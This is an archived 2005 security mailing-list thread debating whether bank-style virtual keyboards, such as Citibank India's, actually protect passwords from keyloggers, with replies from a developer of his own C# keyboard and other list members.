RE: Citi-Bank Virtual Keyboard (is useless)

["Debasis Mohanty" <mail () hackingspirits com>]

> > Mike,

> > I wrote a virtual keyboard in C# for a security application and so far I
cannot find any key logger that can obtain 
> > the password.  I am sure someone could write one, but they HAVE to
obtained the button value and not the form field 
> > value to obtain the password, because of extra security features I added
when the keyboard is used that password is 
> > protected.  

lol !! Release the apps to the internet or if it is used widely (preferrably
any financial organisation) then I am sure if it attract the malicious
program writers then it will hardly take few mins to write a KLs. ;-) 


- D 



-----Original Message-----
From: intel96 [mailto:intel96 () bellsouth net] 
Sent: Sunday, August 14, 2005 6:17 PM
To: mike () securityfocus com; webappsec () securityfocus com;
com () securityfocus com
Subject: Re: Citi-Bank Virtual Keyboard (is useless)

Mike,

I wrote a virtual keyboard in C# for a security application and so far I
cannot find any key logger that can obtain the password.  I am sure someone
could write one, but they HAVE to obtained the button value and not the form
field value to obtain the password, because of extra security features I
added when the keyboard is used that password is protected.  Can you provide
me some examples of key loggers that can obtain the button that was pressed
(using the mousedown event) on a virtual keyboard and not what is sent to
the form field box? 

Thanks,

Intel96

mike () securityfocus com wrote:

> Virtual Keyboards (ala Citibank.co.in) are not very useful. They provide
absolutely no protection whatsoever against keyloggers.
> I have been to the citibank.co.in site and it is clear that even though the
virtual keyboard is dynamic, it still places characters into a form field.
Keyloggers can easily read this and all other fields on the form as plain
text.
> It is highly misleading to give the appearance of security because the
numbers are displayed in some pseudo-random fashion.
> Someone posted here that it is unfair to criticize to discuss the security
aspects of the virtual keyboard because there were no other viable
alternatives. The exact quote was:
> Quote:
>
> "Seriously!! Have you understood the purpose of the original post?? Well,
saying virtual keyboards don't help much is like saying something as if some
other option will really make it hack proof. Can you suggest something
really hackproof?? ... Huh!!
> /quote
>
> The fact that virtual keyboards are marketed as security devices or
enhancements makes them fair game for discussion. An open consensus will
determine whether they are as secure as claimed by their well-intentioned
developers. Period.
> There are many alternatives. Sharecube (self-plug) makes one as do many
other companies.
> Mike Podanoffsky
> mike at sharecube dot com
>
>
>